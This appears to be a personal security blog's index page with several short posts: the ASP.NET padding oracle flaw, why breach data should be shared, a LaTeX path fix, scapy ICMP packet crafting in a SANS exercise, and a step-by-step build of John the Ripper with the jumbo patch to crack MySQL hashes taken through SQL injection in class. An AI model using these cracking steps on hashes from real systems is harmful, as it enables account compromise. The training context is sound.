Kind of reminds me of this story. And this picture of a mini SQL injection:
Microsoft has confirmed that millions ow ASP.Net web applications are vulerable to attacks that could potentionally let the attacker decrypt data and read arbitary files on the remote web server. The vulnerability dubbed “oracle padding” is in the .Net framework, details here, tool (POET) here.
Microsoft will have to patch every supported version of Windows, from XP Service Pack 3 and Server 2003 to Windows 7 and Server 2008 R2, as well as other products, including its IIS and SharePoint server software. They has also released a tool to test for vulnerable web applications. That will definitely be included in my pentest kit.
This goes back to the bear in the woods analogy that I personally hate. The story goes that you don’t have to run faster than the bear, you just have to run faster than the guy next to you. While that’s a funny story, that only works if there are two people and you only encounter one bear. In a true ecosystem you have many many people in the same business, and you have many attackers. If you leave your competitor(s) out to dry that may seem good for you in the short term, but in reality you’re feeding your attacker(s). Ultimately you are allowing the attacker ecosystem to thrive by not reducing the total amount of fraud globally. Yes, this means if you really care about fixing your own problem you have to help your competitors.
This reminded me of the book The New School of Information Security that I read a couple of years ago. While it was a quick read, it made a convincing point about why people within information security should share [statistics of] their incidents and hacker attacks. This resonates well with the reasoning of RSnake above; in a hostile environment, the best thing to reduce the hostility is to cooperate, if not, you’re feeding the troll.
However, my personal experience indicates that little or few information security incidents are publicly reported. Sure enough, a couple of days later RSnake posted this post, confirming my suspicion. How can the total number of incidents go down when everybody in the infosec community reports the opposite?
I think IT and information security people should be more eager to share information about breaches and far less concerned about their company’s good name and “zero incidents reputation”. If we were more focused on sharing data about the incidents, malware attacks and fraud attempts we’re experiencing, that would truly make a difference. That way we could actually gather some real-time statistics on what businesses really are facing, both externally and internally. By sharing this information with everyone, one would potentially reduce the hostility of the surrounding environment, or at least make it difficult for the bad guys out there to survive.
Lots of parts of the community already feel that openness is essential to security. I think willing to share real-time information on internal and external security trends will be vital in the future.
Old, but still interesting: The Deutsche Post announced to the entire information security community that they are invited to try to hack a new Deutsche Post web application. They have even thrown in a not insignificant amount of € for eventual bugs discovered as well. That’s a pretty bold and proactive IT security strategy if you ask me.
The touted anti-censorship software Haystack that were supposed to keep Iranians safe from their government seems to have been brewed on purified snake oil: Several researchers has the last couple of days teared the security in the Haystack software apart, and from the looks of it, it wasn’t a challenge at all.
I tried installing LaTeX using the MacTex distribution, but had trouble using it with the excellent text editor TextMate, it simply could not find pdflatex or any of the other binaries needed to compile my paper. The error message I got was simply
pdflatex not found
After some fumbling I was able to specify the whereabouts of pdflatex by using TextMate’s shell variables (Under Preferences->Advanced), only to find that it still could not find the needed binaries:
kpsewhich: command not found
The LaTeX bundle manual indicated that the MacTeX installer should modify the path environment variable, but it did not modify mine. The solution was to modify /etc/profile’s path variable by changing
Log in and out, and test it by pressing Command-R in TextMate. Voila!
I wanted to learn how to use scapy, specifically to craft some packets that could confuse IDS operators at a blue team/red team exercise at SANS Boston. Now, I’ve used packETH for this before (and it works like a charm), but I wanted to learn something that could be scripted on the command line.
So I installed scapy from the repositories in Ubuntu (or I could have fetched it from the above link). I wanted to play around and craft some ICMP ping packets with custom payloads, just to see if the IDS guys in the other room really was listening on the wire:
ans,unans = sr(IP(dst="10.246.144.1-254")/ICMP()/"PING! If you can read this, you're on the *wrong* OSI layer. O_o Zombies ahead!! Greetings from the SEC542 class")
I’m attending the SANS SEC542 course this week in Boston, and during one of the exercises I managed to extract some MySQL password hashes via a SQL injection.
Needless to say, I wanted to get the password for the database users, so I thought I’d feed it to my trusty friend John the Ripper for some serious cracking. But since version 4.1, MySQL has started to use significantly more secure hashes, namely (raw) SHA-1. And, John does not support these out of the box.
So here’s how you recompile John with the socalled “jumbo patch” to enable cracking of MySQL >= 4.1 password hashes (and loads of other hashing algorithms as well) on Ubuntu:
First, make sure that you have the necessary build tools, header source and libraries:
sudo apt-get install build-essential linux-headers-$(uname -r) libssl-dev
Now, we need to fetch the latest source code for John (at the time of writing, 1.7.6), so switch into a suitable working directory and get it by fetching it from openwall.com as shown here:
cd mkdir src cd src/ mkdir john-bigpatch cd john-bigpatch/ wget http://openwall.com/john/g/john-1.7.6.tar.gz tar xvf john-1.7.6.tar.gz
The last command will expand the fetched archive and create a folder called john-x, cd into it and get the corresponding “jumbo patch“:
cd john-1.7.6/ wget http://openwall.com/john/contrib/john-1.7.6-jumbo-6.diff.gz gunzip john-1.7.6-jumbo-6.diff.gz
Now we’ll patch John up and compile the patched version:
patch -p1 < john-1.7.6-jumbo-6.diff cd src/ make clean linux-x86-any
If you’re on a 64-bit platform, you can use the
linux-x86-64 option instead, this fixed compiling for me on my laptop:
make clean linux-x86-64
That’s it. Now John is ready to chew on password files with SHA-1 hashes:
cd ../run/ ./john hashes.txt
The simple command over is just the start, it will try “single crack” mode first, then use a wordlist with rules, and finally go for “incremental” mode. Check out these great tutorials or the documentation to learn more on how to utilize John at his full potential. Happy cracking!
Hello world, and welcome to my blog about security, hacking and technology in general.